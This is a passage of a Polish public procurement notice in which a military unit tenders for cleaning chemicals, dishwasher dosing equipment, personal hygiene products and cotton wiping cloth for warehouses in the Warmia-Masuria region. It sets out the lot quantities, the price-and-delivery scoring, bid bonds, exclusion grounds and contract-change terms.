techniczna<br/>- ciśnienie robocze 1,76 do 5,86 bar;<br/>- temperatura od 4°C do 40 °C;<br/>- przyłącze wody ½’’;<br/>- dł. węża min.1,5 metra;<br/>- materiał odporny chemicznie.<br/>c) Dozownik produktu myjącego kompatybilny z zaproponowanym produktem do zmywarek typu: <br/>- zmywarka tunelowa Hobart CS-A-12-15SM– 2 szt. <br/>- zmywarka tunelowa Wnterhalter STR110– 3 szt. <br/>- zmywarka kapturowa typu ZKU.10 – 7 szt.<br/>d) Dozownik produktu nabłyszczającego kompatybilny z zaproponowanym produktem do zmywarek <br/> typu:<br/>- zmywarka tunelowa Hobart CS-A-12-15SM– 2 szt. <br/>- zmywarka tunelowa Wnterhalter STR110– 3 szt. <br/>- zmywarka kapturowa typu ZKU.10 – 7 szt.<br/>2) Stały nadzór serwisowy nad sprzętem i dozownikami (zagwarantowanie utrzymania w sprawności <br/> technicznej użyczonych i zainstalowanych u Zamawiającego systemów dozujących), czas reakcji na <br/> zgłoszenie awarii do 48 h przez cały okres 12 miesięcy od dnia podpisania umowy.<br/>3) Dostarczenie wraz z pierwszą dostawą Zamawiającemu planów higieny, instrukcji mycia<br/> i dezynfekcji urządzeń i poszczególnych pomieszczeń kuchennych Zamawiającego dla oferowanych <br/> produktów higieny kuchennej, w formie zalaminowanej, przygotowanej do powieszenia na ściany <br/> kuchni, oraz do wpięcia do dokumentacji HACCP.<br/>4) Wykonawca zobowiązuje się do przeprowadzenia w okresie obowiązywania umowy co najmniej<br/> 1 szkolenia z zakresu zastosowania oraz bezpiecznego użycia produktów chemicznych objętych <br/> przedmiotem zamówienia (w miejscach montażu elementów systemu dozowania stosowanych <br/> produktów higieny kuchennej określonych w umowie) w miejscach wskazanych przez <br/> Zamawiającego (tzn. w miejscach, gdzie zainstalowano urządzenia dozujące).<br/>5) Wykonawca zobowiązany jest do dostarczenia wraz z pierwszą dostawą kart stanowiskowych<br/> i/lub kart charakterystyki tych środków chemicznych będących przedmiotem zamówienia, do<br/> których są one wymagane oraz innych dokumentów z których jednoznacznie wynika dopuszczenie<br/> produktów do stosowania w gastronomii tj. do bezpiecznych kontaktów z żywnością </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39830000-9 - Środki czyszczące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Jeżeli dla pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość oznacza to, że dla danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych - 40%<br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych”<br/><br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/><br/> najniższa oferowana cena brutto dla ilości minimalnych <br/>Liczba punktów = ---------------------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto dla ilości minimalnych oferty badanej<br/><br/>4.	W kryterium „Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych” oferta uzyska:<br/>L.p.	Wariant ilości dostaw <br/><br/>Ilość punktów<br/><br/><br/>1.	WARIANT I:<br/>Po jednej dostawie dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.<br/>	0 pkt<br/>2.	WARIANT II: <br/>Po dwie dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.<br/>	20 pkt<br/>3.	WARIANT III:<br/>Po trzy dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.	30 pkt<br/>4.	WARIANT IV – <br/>Po cztery dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.	40 pkt<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant ilości dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>1)	Termin realizacji dostaw dla ilości minimalnych i maksymalnych do każdego <br/>z magazynów określonych w opisie przedmiotu zamówienia od dnia przesłania zamówienia przez Zamawiającego wynosi do 10 dni roboczych. Za dzień roboczy Zamawiający rozumie dzień od poniedziałku do piątku.<br/>2)	W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu ilości dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT I, w związku z tym otrzyma 0 pkt. <br/>3)	Dostawy do magazynów Zamawiającego w godz.:<br/>- poniedziałek - czwartek 8:00-13:00,<br/>- w piątek 8:00-12:00.<br/>5.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>7.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji wariant dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Nazwa przedmiotu zamówienia Jednostka miary	Minimalna ilość zamówienia	Maksymalna ilość zamówienia	Miejsca dostaw:<br/>1. Mydło do mycia rąk 100g	szt.	5 000	20 000	Magazyn mundurowy, 82-300 Elbląg ul. Królewiecka 169 bud nr 10<br/><br/>Magazyn mundurowy, 14-500 Braniewo ul. Sikorskiego 41 bud nr 53<br/><br/>Magazyn mundurowy, 14-300 Morąg<br/>al. Wojska Polskiego 16 bud nr 45<br/><br/>Magazyn mundurowy, 11-200 Bartoszyce ul. Wojska Polskiego 4 bud nr 9<br/>2. Krem nawilżająco-ochronny do rąk 50ml	szt.	5 000	20 000	<br/>3. Pasta do obuwia specjalnego z aplikatorem gąbki bezbarwna 125g	szt.	200	800	<br/>4. Pasta do mycia rąk z dodatkiem trącym 250g	szt.	5 000	20 000	<br/>5. Pasta do zębów 75ml	szt.	1 000	4 000	<br/>6. Pianka do golenia 200ml	szt.	1 000	4 000	<br/>Wymagania wspólne dla zamówienia nr 3:<br/>1.	Gwarancja (termin ważności) min. 24 miesięcy na cały asortyment licząc od daty przyjęcia dostawy do magazynu Zamawiającego.<br/>2.	W przypadku gdy producent udziela gwarancji dłużej niż 24 miesięcy, gwarancja kończy się w terminie przez niego ustalonym.<br/>3.	Wykonawca dostarczy przedmiot zamówienia fabrycznie nowy i wolny od wad.<br/>4.	Zamówienie będzie realizowane z wykorzystaniem przez zamawiającego prawa opcji tj. opcja polega na powtórzeniu tego samego asortymentu do ilości maksymalnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39830000-9 - Środki czyszczące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Jeżeli dla pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość oznacza to, że dla danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych - 40%<br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych”<br/><br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/><br/> najniższa oferowana cena brutto dla ilości minimalnych <br/>Liczba punktów = ---------------------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto dla ilości minimalnych oferty badanej<br/><br/>4.	W kryterium „Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych” oferta uzyska:<br/>L.p.	Wariant ilości dostaw <br/><br/>Ilość punktów<br/><br/><br/>1.	WARIANT I:<br/>Po jednej dostawie dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.<br/>	0 pkt<br/>2.	WARIANT II: <br/>Po dwie dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.<br/>	20 pkt<br/>3.	WARIANT III:<br/>Po trzy dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.	30 pkt<br/>4.	WARIANT IV – <br/>Po cztery dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.	40 pkt<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant ilości dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>1)	Termin realizacji dostaw dla ilości minimalnych i maksymalnych do każdego <br/>z magazynów określonych w opisie przedmiotu zamówienia od dnia przesłania zamówienia przez Zamawiającego wynosi do 10 dni roboczych. Za dzień roboczy Zamawiający rozumie dzień od poniedziałku do piątku.<br/>2)	W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu ilości dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT I, w związku z tym otrzyma 0 pkt. <br/>3)	Dostawy do magazynów Zamawiającego w godz.:<br/>- poniedziałek - czwartek 8:00-13:00,<br/>- w piątek 8:00-12:00.<br/>5.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>7.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji wariant dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Nazwa przedmiotu zamówienia Jednostka miary	Minimalna ilość zamówienia	Maksymalna ilość zamówienia	Miejsca dostaw:<br/><br/>1. Czyściwo bawełniane	kg	2 500	10 000	Magazyn mundurowy, 82-300 Elbląg ul. Królewiecka 169 bud nr 10<br/>Magazyn mundurowy, 14-500 Braniewo ul. Sikorskiego 41 bud nr 53<br/>Magazyn mundurowy, 14-300 Morąg<br/>al. Wojska Polskiego 16 bud nr 45<br/>Magazyn mundurowy, 11-200 Bartoszyce ul. Wojska Polskiego 4 bud nr 9<br/> 860	860	Magazyn uzbrojenia, 82-300 Elbląg ul. Łęczycka 6 <br/>Magazyn uzbrojenia, 14-500 Braniewo ul. Sikorskiego 41<br/>Magazyn uzbrojenia, 14-300 Morąg al. Wojska Polskiego 16<br/>Magazyn uzbrojenia, 11-200 Bartoszyce ul. Wojska Polskiego 4 <br/>2. Czyściwo bawełniane białe	kg	750	750	Magazyn uzbrojenia, 82-300 Elbląg ul. Łęczycka 6 <br/>Magazyn uzbrojenia, 14-500 Braniewo ul. Sikorskiego 41<br/>Magazyn uzbrojenia, 14-300 Morąg al. Wojska Polskiego 16<br/>Magazyn uzbrojenia, 11-200 Bartoszyce ul. Wojska Polskiego 4<br/><br/>Wymagania wspólne dla zamówienia nr 4:<br/>1.	Gwarancja (termin ważności) min. 12 miesięcy na cały asortyment licząc od daty przyjęcia dostawy do magazynu Zamawiającego.<br/>2.	W przypadku gdy producent udziela gwarancji dłużej niż 12 miesięcy, gwarancja kończy się w terminie przez niego ustalonym.<br/>3.	Wykonawca dostarczy przedmiot zamówienia fabrycznie nowy i wolny od wad.<br/>4.	Zamówienie będzie realizowane z wykorzystaniem przez zamawiającego prawa opcji tj. opcja polega na powtórzeniu tego samego asortymentu do ilości maksymalnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">19620000-8 - Odpady włókiennicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Jeżeli dla pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość oznacza to, że dla danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych - 40%<br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych”<br/><br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/><br/> najniższa oferowana cena brutto dla ilości minimalnych <br/>Liczba punktów = ---------------------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto dla ilości minimalnych oferty badanej<br/><br/>4.	W kryterium „Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych” oferta uzyska:<br/>L.p.	Wariant ilości dostaw <br/><br/>Ilość punktów<br/><br/><br/>1.	WARIANT I:<br/>Po jednej dostawie dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.<br/>	0 pkt<br/>2.	WARIANT II: <br/>Po dwie dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.<br/>	20 pkt<br/>3.	WARIANT III:<br/>Po trzy dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.	30 pkt<br/>4.	WARIANT IV – <br/>Po cztery dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.	40 pkt<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant ilości dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>1)	Termin realizacji dostaw dla ilości minimalnych i maksymalnych do każdego <br/>z magazynów określonych w opisie przedmiotu zamówienia od dnia przesłania zamówienia przez Zamawiającego wynosi do 10 dni roboczych. Za dzień roboczy Zamawiający rozumie dzień od poniedziałku do piątku.<br/>2)	W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu ilości dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT I, w związku z tym otrzyma 0 pkt. <br/>3)	Dostawy do magazynów Zamawiającego w godz.:<br/>- poniedziałek - czwartek 8:00-13:00,<br/>- w piątek 8:00-12:00.<br/>5.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>7.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji wariant dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestracji lub ewidencji; lub Zamawiający nie wezwie, jeśli uzyska je za pomocą bezpłatnych i ogólnodostępnych baz danych w szczególności rejestrów publicznych;<br/>2) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w ust. 5 pkt 1), dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument potwierdzający, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu<br/>z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej<br/>w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem;<br/>3) jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 5 pkt 2), zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Dokument powinien być wystawiony odpowiednio jak w terminie wskazanym w ust. 5 pkt 2);<br/>4) do podmiotów udostępniających zasoby na zasadach określonych<br/>w art. 118 ustawy Pzp (jeżeli dotyczy) oraz podwykonawców niebędących podmiotami udostepniającymi zasoby na tych zasadach, mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, przepisy pkt 2) oraz 3) stosuje się odpowiednio.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający informuje, że w niniejszym postępowaniu nie żąda złożenia przedmiotowych środków dowodowych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości:<br/>a) dla części zamówienia nr 1 – 3 700,00 PLN;<br/>b) dla części zamówienia nr 1 – 2 300,00 PLN;<br/>c) dla części zamówienia nr 1 – 1 650,00 PLN;<br/>d) dla części zamówienia nr 4 – 920,00 PLN.<br/>Wadium musi być wniesione przed upływem terminu składania ofert i utrzymane nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, <br/>o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, potwierdzającego brak podstaw wykluczenia na podstawie art. 108 ust 1 oraz art. 109 ust. 1 pkt 4), 5) i 7) ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego zgodnie ze wzorem – ZAŁĄCZNIK NR 3 SWZ. składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają brak podstaw wykluczenia.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia należy ustanowić pełnomocnika do reprezentowania ich w postepowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być dołączone do oferty (oryginał lub kopia potwierdzana za zgodność z oryginałem przez mocodawcę).<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, do oferty należy dołączyć pełnomocnictwo podpisane elektronicznym podpisem, kwalifikowanym, podpisem zaufanym lub podpisem osobistym przez uprawnionych przedstawicieli pozostałych Wykonawców, upoważniające jednego z Wykonawców do reprezentowania pozostałych.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, których oferta zostanie uznana za najkorzystniejszą, przedłożą umowę regulującą współpracę tych Wykonawców, w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osoby uprawnione do reprezentowania Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy w przypadku: <br/>1)	zmiany przepisów prawnych, mających wpływ na wykonanie przedmiotu zamówienia;<br/>2)	zmiany wysokości wynagrodzenia w sytuacji, gdy nastąpi urzędowa zmiana stawki podatku VAT;<br/>3)	wystąpi konieczność zmiany umowy na podstawie art. 455 ustawy Pzp.<br/>4)	zmiany ilościowe przedmiotu zamówienia (zmniejszenie lub zwiększenie) na inny, pod warunkiem, ze jest objęty umową. O zmianie tej Zamawiający poinformuje Wykonawcę z co najmniej 20 dniowym wyprzedzeniem podając zakres zmian, <br/>a Wykonawca zobowiązany jest do przyjęcia powyższego do realizacji. Jeżeli wystąpi znaczna liczba zmian Zamawiający dokona analizy realizacji umowy w związku ze zmianami i opracuje w tym zakresie aneks do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-01 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span 